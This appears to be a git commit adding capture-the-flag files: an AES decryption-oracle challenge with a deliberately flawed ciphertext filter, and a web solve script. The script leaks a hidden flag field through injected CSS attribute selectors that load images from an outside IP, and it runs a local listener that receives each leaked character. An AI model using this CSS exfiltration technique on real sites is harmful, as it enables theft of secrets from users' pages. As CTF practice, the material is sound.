ctf commits
This commit is contained in:
2
.gitignore
vendored
Normal file
2
.gitignore
vendored
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
|
||||||
|
htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/challenge/
|
||||||
BIN
catthegrey24/.DS_Store
vendored
Normal file
BIN
catthegrey24/.DS_Store
vendored
Normal file
Binary file not shown.
1
catthegrey24/crypto/filter_ciphertext/.gitignore
vendored
Normal file
1
catthegrey24/crypto/filter_ciphertext/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
|||||||
|
.venv/
|
||||||
77
catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py
Normal file
77
catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py
Normal file
@@ -0,0 +1,77 @@
|
|||||||
|
from Crypto.Cipher import AES
|
||||||
|
import os
|
||||||
|
|
||||||
|
with open("flag.txt", "r") as f:
|
||||||
|
flag = f.read()
|
||||||
|
|
||||||
|
BLOCK_SIZE = 16
|
||||||
|
iv = os.urandom(BLOCK_SIZE)
|
||||||
|
|
||||||
|
xor = lambda x, y: bytes(a^b for a,b in zip(x,y))
|
||||||
|
|
||||||
|
key = os.urandom(16)
|
||||||
|
|
||||||
|
def encrypt(pt):
|
||||||
|
cipher = AES.new(key=key, mode=AES.MODE_ECB)
|
||||||
|
blocks = [pt[i:i+BLOCK_SIZE] for i in range(0, len(pt), BLOCK_SIZE)]
|
||||||
|
tmp = iv
|
||||||
|
ret = b""
|
||||||
|
|
||||||
|
for block in blocks:
|
||||||
|
res = cipher.encrypt(xor(block, tmp))
|
||||||
|
ret += res
|
||||||
|
tmp = xor(block, res)
|
||||||
|
|
||||||
|
return ret
|
||||||
|
|
||||||
|
|
||||||
|
def decrypt(ct):
|
||||||
|
cipher = AES.new(key=key, mode=AES.MODE_ECB)
|
||||||
|
blocks = [ct[i:i+BLOCK_SIZE] for i in range(0, len(ct), BLOCK_SIZE)]
|
||||||
|
|
||||||
|
for block in blocks:
|
||||||
|
if block in secret_enc:
|
||||||
|
blocks.remove(block)
|
||||||
|
|
||||||
|
tmp = iv
|
||||||
|
ret = b""
|
||||||
|
|
||||||
|
for block in blocks:
|
||||||
|
res = xor(cipher.decrypt(block), tmp)
|
||||||
|
ret += res
|
||||||
|
tmp = xor(block, res)
|
||||||
|
|
||||||
|
return ret
|
||||||
|
|
||||||
|
secret = os.urandom(80)
|
||||||
|
secret_enc = encrypt(secret)
|
||||||
|
|
||||||
|
print(f"Encrypted secret: {secret_enc.hex()}")
|
||||||
|
|
||||||
|
print("Enter messages to decrypt (in hex): ")
|
||||||
|
|
||||||
|
while True:
|
||||||
|
res = input("> ")
|
||||||
|
|
||||||
|
try:
|
||||||
|
enc = bytes.fromhex(res)
|
||||||
|
|
||||||
|
if (enc == secret_enc):
|
||||||
|
print("Nice try.")
|
||||||
|
continue
|
||||||
|
|
||||||
|
dec = decrypt(enc)
|
||||||
|
if (dec == secret):
|
||||||
|
print(f"Wow! Here's the flag: {flag}")
|
||||||
|
break
|
||||||
|
|
||||||
|
else:
|
||||||
|
print(dec.hex())
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
continue
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
BIN
catthegrey24/web/.DS_Store
vendored
Normal file
BIN
catthegrey24/web/.DS_Store
vendored
Normal file
Binary file not shown.
1
catthegrey24/web/beautiful_styles/.gitignore
vendored
Normal file
1
catthegrey24/web/beautiful_styles/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
|||||||
|
.venv/*
|
||||||
51
catthegrey24/web/beautiful_styles/enumeration.py
Normal file
51
catthegrey24/web/beautiful_styles/enumeration.py
Normal file
@@ -0,0 +1,51 @@
|
|||||||
|
import string
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||||
|
from urllib.parse import unquote
|
||||||
|
|
||||||
|
|
||||||
|
chars = string.ascii_uppercase + string.digits + "f"
|
||||||
|
url = "http://challs2.nusgreyhats.org:33339"
|
||||||
|
headers = {"Content-Type": "application/x-www-form-urlencoded"}
|
||||||
|
|
||||||
|
|
||||||
|
class LeakHandler(BaseHTTPRequestHandler):
|
||||||
|
def do_GET(self):
|
||||||
|
print("Got GET request")
|
||||||
|
leaked_password = unquote(self.path.split("/")[-1])
|
||||||
|
print(f"Password: {leaked_password}")
|
||||||
|
self.send_response(200)
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write(b"exploiting in progress")
|
||||||
|
print("Next round")
|
||||||
|
leak_char(leaked_password)
|
||||||
|
|
||||||
|
|
||||||
|
def generate_css_input(leaked_password):
|
||||||
|
css_input = ""
|
||||||
|
|
||||||
|
for a in chars:
|
||||||
|
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url(http://49.12.225.44:8000/{leaked_password + a});}}'
|
||||||
|
|
||||||
|
return css_input
|
||||||
|
|
||||||
|
|
||||||
|
def leak_char(leaked_password):
|
||||||
|
css_input = generate_css_input(leaked_password)
|
||||||
|
print("Leaking character")
|
||||||
|
with requests.post(
|
||||||
|
f"{url}/submit", data={"css_value": css_input}, headers=headers
|
||||||
|
) as r:
|
||||||
|
match = re.search(r"/judge/([a-zA-Z0-9-]+)", r.text)
|
||||||
|
if match:
|
||||||
|
id_value = match.group(1)
|
||||||
|
print("Found ID:", id_value)
|
||||||
|
r = requests.post(f"http://challs2.nusgreyhats.org:33339/judge/{id_value}")
|
||||||
|
print(r.text)
|
||||||
|
else:
|
||||||
|
print("error")
|
||||||
|
|
||||||
|
|
||||||
|
httpd = HTTPServer(("0.0.0.0", 8000), LeakHandler)
|
||||||
|
httpd.serve_forever()
|
||||||
Reference in New Issue
Block a user